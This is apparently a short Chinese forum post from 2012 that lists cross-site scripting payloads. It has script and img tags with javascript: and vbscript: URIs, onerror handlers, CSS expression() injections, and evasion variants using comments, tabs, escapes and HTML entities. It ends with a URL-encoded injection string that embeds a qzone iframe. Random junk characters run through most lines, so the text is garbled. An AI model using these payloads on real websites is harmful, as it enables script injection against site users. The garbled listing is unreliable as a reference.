<script>alert("跨站")</script> (最常用)
' Y7 V0 I" e2 g5 _8 Q4 G" R' ~<img scr=javascript:alert("跨站")></img>( `. @. r+ D4 w1 `
<img scr="javascript: alert(/跨站/)></img>
/ {1 R- ^) S, i5 w, _+ {8 y<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
/ b* X. l2 J; |( j+ }. z<img scr="#" onerror=alert(/跨站/)></img>
: Q: \. }4 w) {- R' c<img scr="#" style="xss:expression(alert(/xss/));"></img>
2 H) \ x8 M2 G* w; _* m9 V, I<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)4 I( N2 }# E9 Z; p! T& t+ J
<img src=vbscript:msgbox ("xss")></img>- y% m0 V8 D5 m' i! O! R! q# C
<style> input {left:expression (alert('xss'))}</style>1 }) @3 K$ d' O3 w
<div style={left:expression (alert('xss'))}></div>
) k, K9 L; n ~<div style={left:exp/* */ression (alert('xss'))}></div>7 ~0 q7 T- W; Q4 Q
<div style={left:\0065\0078ression (alert('xss'))}></div>1 X/ z3 c; E+ p4 K" O, N
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
9 t" |% t9 m9 kunicode <div style="{left:expRessioN (alert('xss'))}">2 j6 u4 D1 a' C8 ?3 G0 n
! E2 {* y j: _" |
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["4 _+ i S }1 u' r4 l6 |+ P
|
发表于 2012-9-13 17:15:04
收藏
支持
反对